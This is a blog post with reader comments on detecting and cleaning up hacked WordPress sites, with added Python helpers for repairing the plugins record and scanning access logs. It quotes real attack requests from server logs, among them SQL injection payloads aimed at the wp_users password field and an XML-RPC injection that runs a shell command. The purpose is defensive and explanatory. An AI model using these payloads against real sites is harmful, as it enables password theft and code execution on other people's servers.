
Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs? You did upgrade, didn’t you? No? Then it was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log themselves in again at a later date.
That’s how even diligently upgraded blogs were hacked: the bad guys got there before you.

In the last week the hackers have started again. There is no zero-day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net.

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

    define('SECRET_KEY', '1234567890' );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten, so make sure you double check those files for any strange code that uses the eval() command or base64_decode(). Here’s a code snippet taken from here:

    <?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of your blog. If you’ve never edited it, it should look like this:

    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may also have this chunk of code, which relates to the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>

  • They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.
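Hand-editing the serialized active_plugins record is where people go wrong, because the count and string-length fields must match. This added Python example (not code from the post) parses the record, drops any entry that climbs out of the plugins tree or is not a .php file (the ../uploads/…/something.jpg pattern described above), and re-serializes it with correct lengths. The sample value is constructed.

```python
import re
# PHP serialization of a list of strings, as WordPress stores active_plugins:
#   a:<count>:{i:<index>;s:<byte length>:"<value>";...}
_HEAD = re.compile(rb'a:(\d+):\{')
_ITEM = re.compile(rb'i:(\d+);s:(\d+):"')

def unserialize_string_list(blob):
    """Parse the serialized array into a list, trusting the declared byte
    lengths rather than scanning for quotes (values may legally contain them)."""
    data = blob.encode("utf-8")
    m = _HEAD.match(data)
    if not m:
        raise ValueError("not a serialized PHP array")
    count, pos, items = int(m.group(1)), m.end(), []
    for _ in range(count):
        im = _ITEM.match(data, pos)
        if not im:
            raise ValueError("malformed element at byte %d" % pos)
        start, length = im.end(), int(im.group(2))
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("declared length does not match at byte %d" % start)
        items.append(data[start:start + length].decode("utf-8"))
        pos = start + length + 2
    if data[pos:] != b"}":
        raise ValueError("trailing data after array")
    return items

def serialize_string_list(items):
    """Re-serialize with indices renumbered from 0 and byte lengths recomputed,
    which is exactly what goes wrong when the record is edited by hand."""
    body = "".join('i:%d;s:%d:"%s";' % (i, len(v.encode("utf-8")), v)
                   for i, v in enumerate(items))
    return "a:%d:{%s}" % (len(items), body)

def is_suspicious_plugin(path):
    """A legitimate entry is a .php path relative to wp-content/plugins; anything
    that climbs out of that tree or is not PHP (a .jpg under uploads) is rogue."""
    p = path.lower()
    return ".." in p or p.startswith("/") or "uploads/" in p or not p.endswith(".php")

def clean_active_plugins(blob):
    """Return (cleaned serialized value, list of removed entries)."""
    items = unserialize_string_list(blob)
    removed = [p for p in items if is_suspicious_plugin(p)]
    kept = [p for p in items if not is_suspicious_plugin(p)]
    return serialize_string_list(kept), removed

# Constructed sample: one real plugin plus the kind of entry described above.
SAMPLE = ('a:2:{i:0;s:19:"akismet/akismet.php";'
          'i:1;s:39:"../uploads/2008/05/04/jhjyahjhnjnva.jpg";}')

if __name__ == "__main__":
    cleaned, removed = clean_active_plugins(SAMPLE)
    print("removed:", removed, "\nwrite back:", cleaned)
```

Paste the cleaned value back into the active_plugins record in phpMyAdmin, then delete the rogue file from the uploads directory as described above.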

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to log in again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use BackupPC to back up all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo...):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for its 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out-of-date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:

    POST: Array
    (

    => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long-fixed bug. Here’s a snippet of the data.

    HTTP_RAW_POST_DATA: <?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
    <param><value><array><data>
    <value><struct>
    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
    <member><name>params</name><value><array><data>
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
    </data></array></value></member>

  5. That fails too so the query is repeated with similar SQL.

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:

    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:

    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:

    <?xml version="1.0"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:

    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
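The sequence above is easy to spot in an access log once you know the shape of it. This added Python example (not code from the post) parses combined-format log lines, decodes layered percent-encoding so the UNION SELECT probes are visible, flags the quoted user agent and the HEAD/POST pattern against wp-admin, xmlrpc.php and wp-trackback.php, and groups findings per source IP. The log lines and IP addresses are constructed; the request strings follow the ones quoted above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus
# Apache/nginx "combined" access-log format (assumed; adjust for a custom LogFormat)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Signatures drawn from the requests quoted in the post
SQLI = re.compile(r"union\s+(all\s+)?select|from\s+wp_users|char\(\d+\)|substring\(user_pass", re.I)
BAD_UA = re.compile(r"k1b compatible|Security Kol", re.I)
PROBE_PATHS = ("/xmlrpc.php", "/wp-trackback.php", "/wp-admin/admin-ajax.php")

def decode_url(url):
    """Undo layered percent-encoding (%2527 is %27 encoded twice) before matching."""
    while (new := unquote_plus(url)) != url:
        url = new
    return url

def classify(line):
    """Return (ip, [tags]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, url, ua = m.group("ip", "method", "url", "ua")
    path, tags = url.split("?")[0], []
    if SQLI.search(decode_url(url)):
        tags.append("sql-injection-probe")
    if BAD_UA.search(ua):
        tags.append("known-bad-user-agent")
    if method == "HEAD" and path == "/wp-admin/post.php":
        tags.append("head-probe-wp-admin")
    if method == "POST" and path in PROBE_PATHS:
        tags.append("post-to-" + path.rsplit("/", 1)[1])
    return ip, tags

def scan(lines):
    """Aggregate per source IP -> sorted distinct tags; IPs with no findings are omitted."""
    report = defaultdict(set)
    for line in lines:
        r = classify(line)
        if r and r[1]:
            report[r[0]].update(r[1])
    return {ip: sorted(tags) for ip, tags in report.items()}

# Constructed sample log (documentation IPs); request strings follow the post's examples
UA = "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2008:10:00:01 +0100] "HEAD /wp-admin/post.php HTTP/1.1" 302 - "-" "%s"' % UA,
    '203.0.113.5 - - [01/Jun/2008:10:00:02 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "%s"' % UA,
    '203.0.113.5 - - [01/Jun/2008:10:00:04 +0100] "GET /index.php?cat=%%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 5120 "-" "%s"' % UA,
    '203.0.113.5 - - [01/Jun/2008:10:00:06 +0100] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 33 "-" "%s"' % UA,
    '198.51.100.9 - - [01/Jun/2008:10:05:00 +0100] "GET /?p=12 HTTP/1.1" 200 8400 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.0"',
]
print(scan(SAMPLE_LOG))
```

Pipe a real access log in with `scan(open("access.log"))` and treat any IP that collects the SQL-injection tag together with POSTs to xmlrpc.php or wp-trackback.php as worth blocking and investigating.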

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>

Edit: Tripwire URL fixed, thanks Callum.

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

By Donncha

Donncha Ó Caoimh is a software developer at Automattic and WordPress plugin developer. He posts photos at In Photos and can also be found on Twitter.

387 replies on “Did your WordPress site get hacked?”

One thing I do is delete xmlrpc.php. I don’t have any reason to post to my blog through it, and it’s been so bad for security, that I just blow it out. Another thing I do is cat /dev/null > wp-trackback.php which makes it an empty file with no functionality. I hate trackbacks… they drive me nuts, and it seems they too have been responsible for badness. From those two things, I’ve been able to weather these security lapses via the common methods. I got smacked by a bug via an email plugin that allowed spammers to inject email into it, but that’s another story.

I got hacked. I sadly admit that I don’t know when it happened, but I caught it when I was going through referrals as listed in my SiteMeter account and I found that my site had taken a couple of google referrals for some drug.

Since I’d never posted about that drug, I thought it possible that it was comment spam, although Akismet (and Spam Karma before that) had done well in stopping comment spam.

It led me to a post on my blog. I did a “view source” in FireFox and concluded that there was code added to my “footer.php” file. I opened the file in the admin suite and cut the offending code.

How does this stuff get in?

I got hit and some of my hosting customers as well.
Thanks for showing the query they try from the url to access wp_users table. That’s why I think one of the most important steps is to change your table prefix to something other than wp_, to make it impossible to find out.
Also, stay away from fantastico installations, they are insecure.
Regards.

Ok, I upgraded, installed security plugins and still am having the referral problems. No files on my server were changed. After the upgrade they would have been gone anyway. So I downloaded and uploaded and activated a new theme – still wacky referrals, so it must be my database. I’m now renaming all the tables from wp_ to something else. Sigh.

Any ideas where to find the database crud?

Kathy, have you tried your theme folders? I had a .jpg image there called single_old.jpg which was the rogue file.

@kathy,

The database crud I found was in wp_users and wp_options.

I posted details about what I found in the WP forums back in April/May when it happened the first time.

The post with what to look for is http://wordpress.org/support/topic/168964#post-740607

The other thread with info to look for is http://wordpress.org/support/topic/141041

Basically, look for any entry in one of your options fields that has a strange looking file path with lots of dotdotslashes in it.

Is 2.3.3 okay?

The reason why I don’t upgrade is because the true blue theme for K2 hasn’t updated. I love that theme! 😛

@Summer – looking at the database itself, I have no weird active plugins and checking the options table I have no weird theme stuff. Looking at the database (from phpadmin) I see only one user and it isn’t admin as I changed that userid yesterday. I am still getting weird referrals so there is something somewhere in something. I’m going to check the jpgs again – maybe an old theme or a non-active theme? Maybe I’ll just wipe the content directory and start from scratch…

Maybe it would be a great idea to have a plugin that can check for these vulnerabilities ? Something that can check against these routines ?

My knowledge of WP plugins is limited, but feel free to use the idea !

Paul – BloggingSupport.

@kathy,

I discovered yesterday that the same 2 IP addresses were bombarding a server of mine, trying to access wp-comments-post.php for a handful of websites using fake referrers from those same websites.

I knew they were fake because I’d moved those 15-20 domains off that one server and onto another one to prep the old one for a rebuild. The referrers were fake because there was no activity on the real sites matching those hits, and no way the real sites would have referred over to the old server for those calls.

Maybe what you’re seeing and what I was seeing yesterday was just an attack of comment spams? I’m just wondering if they chose the old IP of those domains, and had it hard-coded into their script because the sites had been previously hacked a few months ago. But yes, I went through the themes again just to be sure, and I didn’t find anything this time.

The increase in attacks is both annoying and disturbing.

thanks for this article. I unfortunately have suffered from the spam link hack. And like your article discussed, upgrading after the fact is too late. It got me bumped off google for awhile. Thought I had licked it and that is when I discovered that there were still problems.
Guess I have to dedicate a saturday to following all the advice in this article!

Confirmed: TinyMCE gets hammered on my place, which is running WP 2.5.1. My simple solution: I’ve taken down the whole /wp-includes/js/tinymce/ directory and everything underneath – problem cleanly solved.

No more issues with that @#$% editor messing up my tags, either: pure win-win.

Thanks for the very informative post…
Some of the best practices that I follow in order to keep my blog safe (although it’s not really very unsafe, not being very popular) are that I change my password regularly, every month. The passwords I use are very strong, with a combination of upper and lower case, special characters and numbers.
I update my blog regularly, with the help of the automatic WordPress update plugin; it really is a matter of a few clicks, so I recommend that to everyone.

I recently upgraded my website but before I saw some of the codes posted here. It seems I need to root whatever evil is hiding now inside my blog.

Thanks for this very informative article.

Wow! Thanks, I wasn’t even aware of the security flaw… I upgraded when 2.5.1 came out, but didn’t realize that it was so potentially threatening. I plan on checking all of my sites to make sure they’re not vulnerable!

[…] That was six months ago. Then in May the same thing happened again. This time the cause was a different, new security hole, and again it happened a few days before WordPress could deal with it in an update. The problem is that most blog owners are unaware of the threat from hackers who target blogs, because attacks can happen without giving the blog owner any warning at all. WordPress security vulnerabilities have triggered automated attacks against a very large number of blogs. Sometimes the site owners do not even know what is happening. […]

Paul – there’s this file change plugin that would be useful if you don’t want to run AIDE or Tripwire.

I wouldn’t run it as often as an hour because the find command could be intensive if your site has lots of files.

It also won’t find files that have been modified but had the modification time reset by “touch”.

I’m not aware of a php script that records checksums. That’d be useful, except that hackers could manipulate the data easily.

Thank you! Thank you! Thank you!!!

I had 2 days of redirects after I made each change in your article (the table prefix was hardest) but it has paid off. By the time I did the very last thing – the table prefix – I was finding my site in the Google searches anymore.

It was a LOT of work (since I am clueless when it comes to this stuff) but I got it done. There are two other sites mentioned in the comments – the 9 things and the 10 things lists and those are very helpful also. I also installed a security plugin http://semperfiwebdesign.com/plugins/wp-security-scan/ and a login lockdown plugin http://www.bad-neighborhood.com/(let me look for the links) but couldn’t get the password plugin to work. Fatal errors. (ask apache password protect)

Donncha, Thanks for the write-up but one of the harder parts to fix is the indexing down by Google if your site is compromised. I got nicked by a WordPress flaw and now I spend my time getting things corrected with Google and Yahoo.

Cheers
